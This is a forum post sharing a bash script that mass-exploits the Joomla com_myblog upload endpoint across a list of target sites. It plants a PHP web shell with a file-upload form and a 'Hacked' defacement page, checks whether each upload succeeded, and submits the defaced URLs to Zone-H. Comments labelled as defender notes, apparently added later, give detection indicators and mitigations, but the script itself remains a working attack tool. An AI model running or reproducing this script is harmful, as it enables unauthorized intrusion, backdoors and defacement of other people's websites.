[bash] Joomla com_myblog exploiter (1 Viewer)

Hello guys, I will share another piece of code with you; with it you will be able to exploit the Joomla com_myblog component.

- Auto Submit Zone-H
- Auto Upload Shell
---
com_myblog auto exploiter
--
- 1 . dos2unix exp.sh
- 2 . chmod +x exp.sh
- 3 . ./exp.sh

Code:
#!/bin/bash
#by Gantengers Crew
#com_myblog
#25 Nov 2015 Update !
# Payload template: the here-document below is written to a local file whose
# name carries a double extension (".php" followed by ".xxxjpg").
# The text contains a file-upload form gated on a GET parameter and a static
# HTML page whose <title> is " Hacked "; CheckS later greps fetched content
# for that word to decide whether the upload is being served.
# Defender note: a ".php" segment anywhere in the name of a file sitting in an
# upload directory is a hunting indicator. Upload handlers should validate the
# whole file name and the content, and the web server should not execute
# scripts from upload directories.
# NOTE(review): presumably the target component checks only the final suffix;
# that cannot be confirmed from this script.
cat > mastermaling0day.php.xxxjpg <<_EOF
<?php
error_reporting(0);
if(isset($_GET['mastermaling0day']))
{
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\"></label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br /><br />
<input type=\"submit\" name=\"default\" value=\"Upload\">
</form>";

{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo "Rand(100-100): " . "" . $_FILES["file"]["name"];
}
}
echo "<html><title> Hacked </title><style>body {background-color:black;}</style><center><br><br><br><h2 style="color:white;"> Your system GoT owned by Alfabetovirtual </h2><br><img src="http://oi44.tinypic.com/2nl7jvl.jpg"></center></html>"
?>
_EOF
# ZoneH: reports a URL to a public defacement archive.
# Globals:   urlnya (overwritten from tmp/empes.txt), FILEDX, RDOM1, warnai,
#            WARNA (all written)
# Files:     reads tmp/empes.txt; writes tmp/result1.txt, tmp/Result.txt;
#            appends to log/postOK.log or log/postError.log, and to defaced.txt
# Runs only when tmp/empes.txt exists (CheckD appends to that file on success).
# Defender note: this step publicises the affected URL to a third party, so a
# compromise may be publicly listed before the site owner notices it. The POST
# body carries a fixed "defacer=" handle and the headers are hard-coded, which
# makes the request easy to fingerprint on an egress proxy.
ZoneH(){
if [ -f "tmp/empes.txt" ];then
   urlnya=$(cat tmp/empes.txt)
       # Form POST with static headers; the response body is saved for parsing.
       curl --silent -d "defacer=Alfabetovirtual&domain1=${urlnya}&hackmode=15&reason=1" \
        --header "Host: www.zone-h.org" \
        --header "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0" \
        --header "Accept-Language: en-US,en;q=0.5" \
        --header "Connection: keep-alive" \
        --header "Referer: http://zone-h.org/notify/single" \
        --request POST "http://zone-h.org/notify/single" -o tmp//result1.txt >/dev/null
        # Flatten the HTML to one line, split on <li>/</li>, keep the line that
        # mentions name="domain, and extract its fifth '?'-delimited field.
        cat tmp/result1.txt | sed ':a;N;$!ba;s/\n/ /g' | awk '{gsub("<li>","\n")}1' | awk '{gsub("</li>","\n")}1' | grep "name=\"domain" | awk '{gsub(">","?")}1' | awk '{gsub("<","?")}1' | cut -d '?' -f 5 > tmp/Result.txt
            FILEDX="tmp/Result.txt"
           RDOM1=$(sed -n '1p' < $FILEDX)
            # warnai is 0 when the first extracted line contains "OK" (any case).
            echo $RDOM1 | grep -i "OK" >> /dev/null;warnai=$?
          if [ $warnai -eq 0 ];then
           WARNA="\033[1m\e[1;32m[OK]\E[0m"
           echo "$urlnya" >> log/postOK.log
            else
           WARNA="\033[1m\e[1;31m[ERROR]\E[0m"
           echo "$urlnya" >> log/postError.log
          fi
    echo -e "[+] Zone-H : $urlnya $WARNA"
    echo "$urlnya" >> defaced.txt
fi
}
# UploadS: sends the generated payload file to one host.
# Globals:   namashell (read) - local file attached to the request
# Arguments: $1 - host (and optional path) without scheme
# Files:     writes the HTTP response body to tmp/resp.txt
# The request is a multipart POST with form field "fileToUpload" to
# index.php?option=com_myblog&task=ajaxupload; no cookies or credentials are
# sent.
# Defender note: useful log and WAF indicators visible here are the query
# string "option=com_myblog&task=ajaxupload" on a POST, the field name
# "fileToUpload", the fixed Firefox/3.0.16 User-Agent, and an uploaded file
# name with a ".php" segment before its last extension.
# Mitigation: remove or update the component, require authentication for the
# upload task, and deny script execution in the directory that receives
# uploads.
UploadS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "fileToUpload=@${namashell}" \
--request POST "http://${1}/index.php?option=com_myblog&task=ajaxupload"
}
# UploadC: sends the operator-supplied file to one host.
# Globals:   namafile (read) - local file name entered at the prompt
# Arguments: $1 - host (and optional path) without scheme
# Files:     writes the HTTP response body to tmp/resp.txt
# Same request shape as UploadS: a multipart POST, form field "fileToUpload",
# to index.php?option=com_myblog&task=ajaxupload, with a hard-coded
# User-Agent and no cookies or credentials.
# Defender note: an unauthenticated POST to this task in access logs is worth
# treating as an attempted file write; check the upload directory for files
# created at the same timestamp.
UploadC(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "fileToUpload=@${namafile}" \
--request POST "http://${1}/index.php?option=com_myblog&task=ajaxupload"
}
# CheckS: checks whether the file sent by UploadS is being served.
# Globals:   urlnya (read); letaknya, cd (written)
# Files:     reads tmp/resp.txt; writes tmp/cs.txt; appends to shell.txt
# The location is taken from the upload response: the line containing the
# host string, second field when split on single quotes.
# NOTE(review): this implies the endpoint echoes the stored file's URL back to
# the client in its response - confirm against the component.
# Defender note: a GET for a freshly uploaded file from the same client
# shortly after the upload POST is a strong correlation signal in access logs.
CheckS(){
letaknya=$(cat tmp/resp.txt | grep "${urlnya}" | cut -d "'" -f 2)
echo "+ Upload Shell => ${urlnya}"
curl --silent --max-time 10 --connect-timeout 10 ${letaknya} -o tmp/cs.txt
# No output file is reported as a timeout ("RTO").
if [ ! -f tmp/cs.txt ];then
echo "+ $urlnya : RTO"
continue
fi
# cd is 0 when the fetched content contains "Hacked" (case-insensitive).
cat tmp/cs.txt | grep -i "Hacked" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo -e "+ $letaknya : \e[1;32m[Upload Shell Success]\E[0m"
echo "$letaknya" >> shell.txt
else
echo -e "+ $urlnya : \e[1;31m[Upload Shell Failed]\E[0m"
fi
}
# CheckD: checks whether the file sent by UploadC is being served.
# Globals:   urlnya (read); letaknya, cd (written)
# Files:     reads tmp/resp.txt; writes tmp/cd.txt; appends to success.txt
#            and tmp/empes.txt (the latter is what ZoneH later reads)
# The location is parsed from the upload response exactly as in CheckS.
# Defender note: the success test is only a case-insensitive match for
# "hacked" in the fetched content, so a content-integrity monitor that alerts
# on that string appearing under the upload path would catch the same event.
CheckD(){
letaknya=$(cat tmp/resp.txt | grep "${urlnya}" | cut -d "'" -f 2)
curl --silent --max-time 10 --connect-timeout 10 ${letaknya} -o tmp/cd.txt
# No output file is reported as a timeout ("RTO").
if [ ! -f tmp/cd.txt ];then
echo "+ $urlnya : RTO"
continue
fi
cat tmp/cd.txt | grep -i "hacked" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo -e "+ ${letaknya} : \e[1;32m[Exploit Success]\E[0m"
echo "${letaknya}" >> success.txt
echo "${letaknya}" >> tmp/empes.txt
else
echo -e "+ $urlnya : \e[1;31m[Exploit Failed]\E[0m"
fi
}
# CheckV: probes whether the upload task answers on a host.
# Globals:   urlnya (read); cv (written)
# Arguments: $1 - host (and optional path) without scheme
# Files:     writes tmp/cv.txt
# Sends a plain GET (no cookies or credentials) to the ajaxupload task and
# looks for the "No file has been uploaded" error text in the response.
# Defender note: site owners can run the same check against their own site.
# If an anonymous request to this task returns that error rather than a login
# redirect or a 403, the upload handler is reachable without a session and
# the component should be updated, removed, or blocked at the web server.
CheckV(){
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/index.php?option=com_myblog&task=ajaxupload" -o tmp/cv.txt
# No output file is reported as a timeout ("RTO").
if [ ! -f tmp/cv.txt ];then
echo "+ $urlnya : RTO"
continue
fi
# cv is 1 when none of the expected error strings are present.
cat tmp/cv.txt | grep "{error: 'No file has been uploaded.', msg: '' }\|No file has been uploaded\|file has been uploaded." > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "+ $urlnya : Not Vuln"
continue
else
echo "+ $urlnya : Vuln"
fi
}
# Exploit: main loop over the entries of the list file.
# Globals:   list (read); url, urlnya, ccl (written)
# Files:     creates/appends load.txt (record of entries already processed);
#            deletes everything under tmp/ after each entry
# For each entry: strip the scheme, skip it if already recorded in load.txt,
# then run the probe, both uploads with their checks, and the notification.
# Defender note: the sequence per host is probe GET, upload POST, fetch GET,
# upload POST, fetch GET, all within seconds and from one client. That burst
# against the com_myblog upload task is a compact detection pattern.
# Forensic note: load.txt, success.txt, shell.txt, defaced.txt and log/ in the
# working directory hold the operator's history of processed hosts.
Exploit(){
for url in `cat $list`
do
# Normalise the entry: drop "http://" and "https://", collapse "//" to "/".
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
# ccl is 1 when the entry is not yet present in load.txt.
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
# Already processed (recorded in load.txt).
# To process it again, delete load.txt.
continue
fi
CheckV $urlnya
UploadC $urlnya
CheckD $urlnya
UploadS $urlnya
CheckS $urlnya
ZoneH
rm -f tmp/*
done
}
# Lengkap: pre-flight setup before the main loop.
# Globals:   namashell (written); namafile, list (read)
# Sets the payload file name, creates the log/ and tmp/ working directories
# if missing, and exits when either the operator-supplied file or the list
# file does not exist.
# Defender note: the fixed payload file name assigned here is a static
# indicator to search for in upload directories and in multipart request
# bodies.
Lengkap(){
namashell="mastermaling0day.php.xxxjpg"
if [ ! -d log ];then
mkdir log
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f $namafile ];then
echo "[?] file $namafile not found"
exit
fi
if [ ! -f $list ];then
echo "[?] file $list not found"
exit
fi
}
# Entry point: prompt for the local file to send (namafile) and the file
# holding the list of hosts (list), run the pre-flight checks, then start the
# main loop.
read -p "+ Enter name of File = " namafile
read -p "+ Enter list target = " list
Lengkap
Exploit
 
